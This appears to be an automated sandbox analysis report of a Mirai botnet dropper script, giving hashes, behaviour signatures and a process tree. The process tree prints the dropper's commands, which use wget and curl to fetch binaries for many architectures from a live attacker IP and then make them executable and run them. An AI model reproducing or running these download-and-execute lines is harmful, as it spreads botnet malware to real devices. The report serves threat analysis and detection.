Overview

overview

10

Static

static

1

Oblivion121.sh

ubuntu-18.04-amd64

10

Oblivion121.sh

debian-9-armhf

10

Oblivion121.sh

debian-9-mips

10

Oblivion121.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    29s
  • max time network
    30s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    15/12/2024, 10:38

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Oblivion121.sh

  • Size

    1KB

  • MD5

    90e5e43e5d798a41934d7f30e8208b24

  • SHA1

    0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7

  • SHA256

    09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233

  • SHA512

    ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032

Score
10/10
miraimiraibotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

MIRAI

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (34482) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 20 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 20 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/Oblivion121.sh
    /tmp/Oblivion121.sh
    1⤵
    • Writes file to tmp directory
    PID:1512
    • /usr/bin/wget
      wget http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:1513
    • /usr/bin/curl
      curl -O http://188.132.232.157/IGz/IGz.x86
      2⤵
      • Writes file to tmp directory
      PID:1517
    • /bin/cat
      cat IGz.x86
      2⤵
        PID:1518
      • /bin/chmod
        chmod +x config-err-1iOseq cp IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1520
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1524
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1530
      • /bin/chmod
        chmod +x config-err-1iOseq cp IGz.mips IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
        2⤵
        • File and Directory Permissions Modification
        PID:1532
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        PID:1533
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1537
      • /usr/bin/curl
        curl -O http://188.132.232.157/IGz/IGz.mpsl
        2⤵
        • Writes file to tmp directory
        PID:1541
      • /bin/chmod
        chmod +x config-err-1iOseq cp IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
        2⤵
        • File and Directory Permissions Modification
        PID:1543
      • /tmp/cp
        ./cp mpsl
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Enumerates active TCP sockets
        • Reads system network configuration
        • Reads runtime system information
        PID:1544
      • /usr/bin/wget
        wget http://188.132.232.157/IGz/IGz.arm4
        2⤵
          PID:1548
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm4
          2⤵
          • Writes file to tmp directory
          PID:1552
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1556
        • /tmp/cp
          ./cp arm4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1557
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm5
          2⤵
          • Writes file to tmp directory
          PID:1561
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm5
          2⤵
          • Writes file to tmp directory
          PID:1567
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1569
        • /tmp/cp
          ./cp arm5
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1570
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm6
          2⤵
          • Writes file to tmp directory
          PID:1574
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm6
          2⤵
          • Writes file to tmp directory
          PID:1578
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1582
        • /tmp/cp
          ./cp arm6
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1583
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.arm7
          2⤵
          • Writes file to tmp directory
          PID:1587
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.arm7
          2⤵
          • Writes file to tmp directory
          PID:1591
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1593
        • /tmp/cp
          ./cp arm7
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1594
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.ppc
          2⤵
          • Writes file to tmp directory
          PID:1598
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.ppc
          2⤵
          • Writes file to tmp directory
          PID:1602
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.ppc IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1604
        • /tmp/cp
          ./cp ppc
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1605
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.m68k
          2⤵
          • Writes file to tmp directory
          PID:1609
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.m68k
          2⤵
          • Writes file to tmp directory
          PID:1613
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1615
        • /tmp/cp
          ./cp m68k
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1616
        • /usr/bin/wget
          wget http://188.132.232.157/IGz/IGz.sh4
          2⤵
          • Writes file to tmp directory
          PID:1620
        • /usr/bin/curl
          curl -O http://188.132.232.157/IGz/IGz.sh4
          2⤵
          • Writes file to tmp directory
          PID:1624
        • /bin/chmod
          chmod +x config-err-1iOseq cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.sh4 IGz.x86 netplan_xwbzt6lw Oblivion121.sh snap-private-tmp ssh-pJ4Pd5P3j8Hk systemd-private-15f5c68ed8b943739b354d2378d07dfc-bolt.service-vOM94K systemd-private-15f5c68ed8b943739b354d2378d07dfc-colord.service-LPBn4T systemd-private-15f5c68ed8b943739b354d2378d07dfc-ModemManager.service-d0VBM3 systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-resolved.service-5RBQQf systemd-private-15f5c68ed8b943739b354d2378d07dfc-systemd-timedated.service-hiqcIv
          2⤵
          • File and Directory Permissions Modification
          PID:1626
        • /tmp/cp
          ./cp sh4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Reads system network configuration
          • Reads runtime system information
          PID:1627

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/IGz.x86
        Filesize

        72KB

        MD5

        acd283bf65ed831dd470134f403a9294

        SHA1

        3c0f8231e8089430e32ef8daea73597170a2b4c0

        SHA256

        8d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67

        SHA512

        0847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72

        Download Submit